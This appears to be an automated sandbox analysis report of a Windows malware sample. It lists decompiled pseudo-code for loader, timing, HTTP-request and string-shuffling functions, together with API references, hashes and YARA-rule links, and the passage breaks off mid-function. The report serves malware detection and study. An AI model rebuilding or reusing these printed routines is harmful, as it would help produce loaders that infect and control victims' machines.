Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
Instruction ID: 703f11fa8a27d996fe27e145a0f2623f1ccbe29c67bd5c4830df0f77db47329d
Opcode Fuzzy Hash: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
Instruction Fuzzy Hash: 3F3189B060168A9FD710CF6ACD8486BBBFCEF54344700447AE649EB661EB74EA018F24

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004016EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403104 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403104 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E004017CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403104 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403104 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403104 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403104 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0040100e
0x00401012
0x004010d3
0x00401018
0x00401030
0x0040103f
0x00401046
0x00401048
0x0040104d
0x004010cb
0x004010cc
0x0040104f
0x0040105c
0x0040105e
0x00401063
0x00000000
0x00401065
0x00401072
0x00401074
0x00401079
0x00000000
0x0040107b
0x00401088
0x0040108a
0x0040108f
0x00000000
0x00401091
0x0040109e
0x004010a0
0x004010a5
0x00000000
0x004010a7
0x004010ad
0x004010b3
0x004010b8
0x004010bd
0x004010c2
0x00000000
0x004010c4
0x004010c7
0x004010c7
0x004010c2
0x004010a5
0x0040108f
0x00401079
0x00401063
0x0040104d
0x004010e1

APIs

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction ID: 9140f5516d8f6e96bc42ac16d424ff358ba4bbc2604748eb03e792c2eb0f4ca6
Opcode Fuzzy Hash: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction Fuzzy Hash: 0F21BBB060064AAFD710DF6ACD84D6BBBFCEF54344700043AE649EB260DB74EA018F28

Uniqueness

Uniqueness Score: -1.00%

Function 022B2789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E022B2789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x22bd238 = _t10;
				if(_t10 != 0) {
					 *0x22bd1a8 = GetTickCount();
					_t12 = E022B9EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L022BB0CA();
							_t34 = _t14 + _t16;
							_t18 = E022B122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E022B4D4D(_t26) != 0) {
							 *0x22bd260 = 1; // executed
						}
						_t12 = E022B2F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x022b2789
0x022b278f
0x022b2790
0x022b279c
0x022b27a2
0x022b27a9
0x022b27b9
0x022b27be
0x022b27c5
0x022b27c7
0x022b27cc
0x022b27d2
0x022b27d8
0x022b27e2
0x022b27e6
0x022b27e8
0x022b27ed
0x022b27ee
0x022b27ef
0x022b27f4
0x022b27fa
0x022b2805
0x022b2806
0x022b280c
0x022b2812
0x022b281e
0x022b2820
0x022b2820
0x022b282a
0x022b282a
0x022b27ab
0x022b27ad
0x022b27ad
0x022b2834

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B279C
GetTickCount.KERNEL32 ref: 022B27B0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,022B7F25,?), ref: 022B27CC
SwitchToThread.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B27D2
_aullrem.NTDLL(?,?,00000013,00000000), ref: 022B27EF
Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B280C

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: d64313dbd1fa6027446bec34e58ca2ed327a7e5320a6ebd6adb743c65b3bc95b
Instruction ID: be1a9ebba26545cb22cf52fe1cf9e7b3d09433ded51a970e083f12ba24794f49
Opcode Fuzzy Hash: d64313dbd1fa6027446bec34e58ca2ed327a7e5320a6ebd6adb743c65b3bc95b
Instruction Fuzzy Hash: 9811C672EA0301AFE7166BF4EC5DBDA3699DF44390F004A29FD55C6294EBB0D850CA64

Uniqueness

Uniqueness Score: -1.00%

Function 022B97F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B97F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E022B8CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E022BA85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x022b97f7
0x022b9804
0x022b9806
0x022b9869
0x00000000
0x022b9869
0x022b981e
0x022b9825
0x022b9831
0x022b9836
0x022b984c
0x022b985c
0x00000000
0x022b984e
0x022b984e
0x022b9855
0x022b9862
0x022b9862
0x022b9862
0x022b9855
0x022b984c
0x022b9867
0x00000000
0x00000000
0x022b986d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022B9831
ResetEvent.KERNEL32(?), ref: 022B9836
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 022B9843
GetLastError.KERNEL32 ref: 022B984E
GetLastError.KERNEL32(?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022B9869

Part of subcall function 022B8CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000), ref: 022B8D06
Part of subcall function 022B8CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102,022B937B,?), ref: 022B8D64
Part of subcall function 022B8CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D74

SetEvent.KERNEL32(?), ref: 022B985C

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 67fc124ddf4098b597bdef206d1312979c58800e34838f3cb245243d14143a9f
Instruction ID: 528cd7147805c3714249dd729d6fb18e265b31af4bea19d8305721369ac705bf
Opcode Fuzzy Hash: 67fc124ddf4098b597bdef206d1312979c58800e34838f3cb245243d14143a9f
Instruction Fuzzy Hash: D001AD31120302AFDF336BF2EC48F9BB6A9AF483A8F500A25F655950E4D721D894DE61

Uniqueness

Uniqueness Score: -1.00%

Function 022B1128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E022B1128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x22bd32c; // 0x47795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x22bd32c; // 0x47795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x22bd030) {
					HeapFree( *0x22bd238, 0, _t8);
				}
				_t9 = E022B4A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x22bd32c; // 0x47795b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x022b1128
0x022b1128
0x022b1131
0x022b1141
0x022b1141
0x022b1146
0x022b114b
0x00000000
0x00000000
0x022b113b
0x022b113b
0x022b114d
0x022b1151
0x022b1163
0x022b1163
0x022b116e
0x022b1173
0x022b1176
0x022b117b
0x022b117f
0x022b1185

APIs

RtlEnterCriticalSection.NTDLL(04779570), ref: 022B1131
Sleep.KERNEL32(0000000A,?,022B30F3), ref: 022B113B
HeapFree.KERNEL32(00000000,00000000,?,022B30F3), ref: 022B1163
RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B117F

Strings

Ut, xrefs: 022B1163

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 8980a8f6d9b4d8a4c1ab6b04a61384a278c2f852208fc23d55bf1108d2e65c17
Instruction ID: c455ea1116a6d3eb39454fc8b8830ae4181b4e635b4a4c09f7fae880bc976fff
Opcode Fuzzy Hash: 8980a8f6d9b4d8a4c1ab6b04a61384a278c2f852208fc23d55bf1108d2e65c17
Instruction Fuzzy Hash: C2F05E30A642419FD7139FE4F85CF967BE8AF04380B048C05F545CA269C320E870CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00419617, Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

__CrtCheckMemory.LIBCMTD ref: 0041963A
__heap_alloc_base.LIBCMTD ref: 004197C7
_memset.LIBCMT ref: 00419915
_memset.LIBCMT ref: 00419932
_memset.LIBCMT ref: 0041994D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
Instruction ID: 883977096d5b4a7fe5b6a7c637ebf55110fbed55347a43cd2ef017c13511578a
Opcode Fuzzy Hash: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
Instruction Fuzzy Hash: 06B1AC74A00205DBDB18DF44DD95BEA77F1AB48304F20816AE9196B3D1C379AE81CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 022B2F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E022B2F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E022B59A4();
				if(_t21 != 0) {
					_t59 =  *0x22bd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x22bd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x22bd160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E022B2B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x22bd2a8; // 0x24ba5a8
					if( *0x22bd25c > 5) {
						_t8 = _t26 + 0x22be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x22be9f5; // 0x44283a44
						_t27 = _t7;
					}
					E022B9154(_t27, _t27);
					_t31 = E022B8E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x22bd270 =  *0x22bd270 ^ 0x81bbe65d;
						_t32 = E022B1525(0x60);
						 *0x22bd32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x22bd32c; // 0x47795b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x22bd32c; // 0x47795b0
							 *_t51 = 0x22be81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x22bd238, 0, 0x43);
							 *0x22bd2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x22bd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x22bd2a8; // 0x24ba5a8
								_t13 = _t58 + 0x22be55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x22bc287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E022B7A2E( ~_v8 &  *0x22bd270, 0x22bd00c); // executed
								_t42 = E022B7FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E022B50E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E022B7C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E022B46B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x22bd15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E022B8B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x022b2f70
0x022b2f7b
0x022b2f7e
0x022b2f81
0x022b2f84
0x022b2f8b
0x022b2f8d
0x022b2f99
0x022b2f9b
0x022b2f9b
0x022b2fa4
0x022b2faa
0x022b2faf
0x022b2fc9
0x022b2fd5
0x022b2fd7
0x022b2fdc
0x022b2fe6
0x022b2fe6
0x022b2fde
0x022b2fde
0x022b2fde
0x022b2fde
0x022b2fed
0x022b2ffa
0x022b3001
0x022b3006
0x022b3006
0x022b300e
0x022b3011
0x022b3037
0x022b3043
0x022b3048
0x022b304d
0x022b304f
0x022b307b
0x022b307d
0x022b3051
0x022b3055
0x022b305a
0x022b305f
0x022b3066
0x022b306c
0x022b3071
0x022b3077
0x022b307e
0x022b3080
0x022b3082
0x022b3091
0x022b3097
0x022b309c
0x022b309e
0x022b30ce
0x022b30d0
0x022b30a0
0x022b30a0
0x022b30a6
0x022b30b3
0x022b30b9
0x022b30b9
0x022b30c1
0x022b30ca
0x022b30d1
0x022b30d3
0x022b30d5
0x022b30dc
0x022b30e9
0x022b30ee
0x022b30f3
0x022b30f5
0x022b30f7
0x00000000
0x00000000
0x022b30f9
0x022b30fe
0x022b3100
0x022b3107
0x022b310b
0x022b310e
0x022b3123
0x022b3127
0x022b312c
0x00000000
0x022b312c
0x022b3110
0x022b3112
0x00000000
0x00000000
0x022b311d
0x022b311f
0x022b3121
0x00000000
0x00000000
0x00000000
0x022b3121
0x022b3104
0x022b3104
0x022b30d5
0x022b3013
0x022b3013
0x022b3018
0x022b312e
0x022b3132
0x022b313a
0x022b313a
0x00000000
0x022b3132
0x022b301e
0x022b3021
0x022b302b
0x022b3032
0x00000000
0x022b3142
0x022b3142
0x022b3146
0x022b314a
0x022b314a

APIs

Part of subcall function 022B59A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,022B2F89,00000000,00000000), ref: 022B59B3

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 022B3006

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

memset.NTDLL ref: 022B3055
RtlInitializeCriticalSection.NTDLL(04779570), ref: 022B3066

Part of subcall function 022B46B2: memset.NTDLL ref: 022B46C7
Part of subcall function 022B46B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 022B4709
Part of subcall function 022B46B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 022B4714

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 022B3091
wsprintfA.USER32 ref: 022B30C1

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 0e04faf9c58a4bf127444849ee6e5c254d6b2f8934bf5fb92243ce0b3c099ed4
Instruction ID: 394360f8583ef59410cba8dc8765918e39cf569d04634a657d5832f2130b50b0
Opcode Fuzzy Hash: 0e04faf9c58a4bf127444849ee6e5c254d6b2f8934bf5fb92243ce0b3c099ed4
Instruction Fuzzy Hash: 6C51F075E70315ABDB23EBE4EC88BEE73A8AF08784F044865E501D7259EBB08554CF60

Uniqueness

Uniqueness Score: -1.00%

Function 022B2D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E022B2D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E022B1525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E022B8B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E022B1525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x22bd278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x022b2d7b
0x022b2d82
0x022b2d87
0x022b2d8a
0x022b2d91
0x022b2d94
0x022b2d97
0x022b2d9c
0x022b2da1
0x022b2ef5
0x022b2ef7
0x022b2ef9
0x022b2efe
0x022b2efe
0x022b2da7
0x022b2daa
0x022b2dad
0x022b2daf
0x022b2daf
0x022b2db3
0x00000000
0x00000000
0x022b2db7
0x022b2de3
0x022b2de8
0x022b2dea
0x022b2dea
0x022b2ded
0x022b2df0
0x022b2df0
0x022b2df2
0x00000000
0x022b2dbd
0x022b2dbf
0x022b2dde
0x022b2dde
0x022b2df5
0x022b2df5
0x022b2df6
0x022b2df6
0x022b2df9
0x00000000
0x00000000
0x00000000
0x022b2df9
0x022b2dc3
0x022b2e0a
0x022b2e0e
0x022b2ee8
0x022b2eea
0x022b2eea
0x022b2eeb
0x022b2eee
0x00000000
0x022b2eee
0x022b2e17
0x022b2e28
0x022b2e2c
0x022b2ee4
0x00000000
0x022b2ee4
0x022b2e32
0x022b2e35
0x022b2e39
0x022b2e3d
0x022b2e42
0x022b2eda
0x022b2eda
0x00000000
0x022b2ee0
0x022b2e4d
0x022b2e56
0x022b2e6a
0x022b2e71
0x022b2e86
0x022b2e8c
0x022b2e94
0x00000000
0x00000000
0x00000000
0x00000000
0x022b2e96
0x022b2e96
0x022b2e96
0x022b2e9d
0x022b2ea5
0x00000000
0x00000000
0x022b2ea7
0x022b2eb0
0x00000000
0x00000000
0x00000000
0x022b2eb2
0x022b2eb4
0x022b2eb7
0x022b2eb7
0x022b2eba
0x022b2ebe
0x022b2ec1
0x022b2ec7
0x022b2eca
0x022b2ed1
0x00000000
0x022b2e4d
0x022b2dc8
0x022b2dd0
0x022b2dd6
0x022b2dd8
0x022b2dd8
0x022b2ddb
0x022b2ddd
0x00000000
0x022b2ddd
0x022b2db7
0x022b2dfd
0x022b2e02
0x022b2e04
0x022b2e04
0x022b2e07
0x022b2e07
0x00000000

APIs

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

lstrcpy.KERNEL32(69B25F45,00000020), ref: 022B2E71
lstrcat.KERNEL32(69B25F45,00000020), ref: 022B2E86
lstrcmp.KERNEL32(00000000,69B25F45), ref: 022B2E9D
lstrlen.KERNEL32(69B25F45), ref: 022B2EC1

Strings

, xrefs: 022B2E0A

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 10717efda2dc03e7ec4ece4561b305f3f90d4e42b6e7e2f76c9f03f9fecf7b1f
Instruction ID: ad1fabc8df9a8942bb2f9864647107c80ee0ff30682b6c19f04c32470f59e2d2
Opcode Fuzzy Hash: 10717efda2dc03e7ec4ece4561b305f3f90d4e42b6e7e2f76c9f03f9fecf7b1f
Instruction Fuzzy Hash: 4E51B375A1020AEBDF12DFD9C8847EDBBB5FF55384F04825AEC159B209C770AA51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4030e0 = _t1;
				if(_t1 != 0) {
